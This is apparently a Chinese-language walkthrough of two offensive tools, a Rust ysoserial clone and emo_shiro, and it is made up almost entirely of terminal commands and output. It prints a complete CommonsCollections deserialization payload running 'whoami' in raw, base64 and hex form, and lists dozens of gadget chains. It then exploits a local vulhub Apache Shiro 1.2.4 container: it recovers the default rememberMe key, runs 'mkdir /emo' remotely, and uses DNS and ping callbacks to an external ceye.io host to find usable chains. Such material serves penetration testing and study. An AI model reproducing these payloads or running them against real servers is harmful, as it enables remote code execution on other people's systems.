➜ ~ ./ysoserial_amd64 --help
Usage: ysoserial_amd64 [-p <payload>] [-c <command>] [--url <url>] [--echo-name <echo-name>] [--command-name <command-name>] [-o <output>] [-f <format>] [-l]
ysoserial_rs
Options:
-p, --payload select a payload
-c, --command command to execute
--url url to request dns
--echo-name tomcat echo request header name
--command-name tomcat command request header name
-o, --output save payload to file
-f, --format format to hex or base64
-l, --list list all payload
--help display usage information
➜ ~ ./ysoserial_amd64 -l [5/62]
Payload List:
------------
bs1
c3p0
cc1
cc2
cc3
cc4
cc5
cc6
cc7
cck1
cck1_tomcat_echo
cck2
cck2_tomcat_echo
cck3
cck4
clojure
groovy1
hibernate1
hibernate2
javassist_weld1
jboss_interceptors1
jdk7u21
jdk8u20
json1
mozilla_rhino1
mozilla_rhino2
myfaces1
rome
shiro_spc
spring1
spring2
url_dns
vaadin1
cc1
攻击链,执行的命令为whoami
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami
sr2sun.reflect.annotation.AnnotationInvocationHandlerU~L
java.util.Mapxrjava.lang.reflect.Proxy' CLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapn唂yLfactoryt,LiTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;V*4xpsr;org.apache.commons.collections.functors.ConstantTransformerXvAL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformerk{|8[iArgst[Ljava/lang/Object;L
iMethodNametLjava/lang/String;[
iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;Xs)lxpt
getRuntimeur[Ljava.lang.Class;Zxpt getMethoduq~vrjava.lang.String8z;Bxpvq~sq~uq~uq~invokeuq~vrjava.lang.Objectxpvq~q~ur[Ljava.lang.String;V{Gxptwhoamitexecuq~q~#sq~srjava.lang.Integer⠤8Ivaluexrjava.lang.Number
xpsrjava.util.HashMap`F
loadFactorI [email protected]~:%
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami -o cc1.ser
写入文件:cc1.ser,payload大小:1398
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami -f base64
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQABndob2FtaXQABGV4ZWN1cQB+AB4AAAABcQB+ACNzcQB+ABFzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgA6%
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami -f hex
aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000677686f616d69740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a%
shiro_spc
的payload替换为攻击payload就可以了,如果只是想验证漏洞是否存在,就可以使用url_dns
这个payload,指定DNS记录服务器,可以去查看DNS记录。https://github.com/emo-cat/emo_shiro
➜ ~ ./emo_shiro --help
Usage: emo_shiro [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]
emo_shiro
Options:
--key you can specify known keys
-m, --mode apache-shiro encryption algorithm,default: CBC
-t, --target the target
-s, --ser serialize file
--file read the target from the file
--keys read the key from the file
--csv export to the csv file
--proxy proxy to use for requests
(ex:[http(s)|socks5(h)]://host:port)
--timeout set request timeout
--thread number of concurrent threads
--exploit exploit mode
--dns dns identifier, default: 981tzg.ceye.io
-p, --payload select a payload
-c, --command command to execute
--echo-name tomcat echo request header name
--command-name tomcat command request header name
-l, --list list all payload
--help display usage information
➜ ~ docker run --rm -p 8080:8080 vulhub/shiro:1.2.4
shiro_spc
的payload。➜ ~ ./emo_shiro -t <http://127.0.0.1:8080>
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=F030B2F5CECA009F87310F3ADABDEDE5> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜ ~ ./emo_shiro -t <http://127.0.0.1:8080> --exploit --dns test.981tzg.ceye.io
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=6E1B5E50D8ABC278B182A1EFEF0339C6> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜ ~
➜ ~ ./emo_shiro -t <http://127.0.0.1:8080> --exploit -p cck1 -c "mkdir /emo"
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=DCBEFCFB8DF4FA752EB0BD114D9BEE2A> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜ ~
[email protected]:/# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin shirodemo-1.0-SNAPSHOT.jar srv sys tmp usr var
[email protected]:/# ls
bin boot dev emo etc home lib lib64 media mnt opt proc root run sbin shirodemo-1.0-SNAPSHOT.jar srv sys tmp usr var
[email protected]:/# cd emo/
[email protected]:/emo#
ping -n 2 -w 2 981tzg.ceye.io
,虽然在linux前一个ping会报错,但是还是能自动结束。➜ emo_shiro git:(main) ✗ cargo run -- -t <http://127.0.0.1:8080> --exploit --dns 981tzg.ceye.io --chain
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
bs1
,cck3
,cc5
,cc7
,cck1
和cc6
利用链可用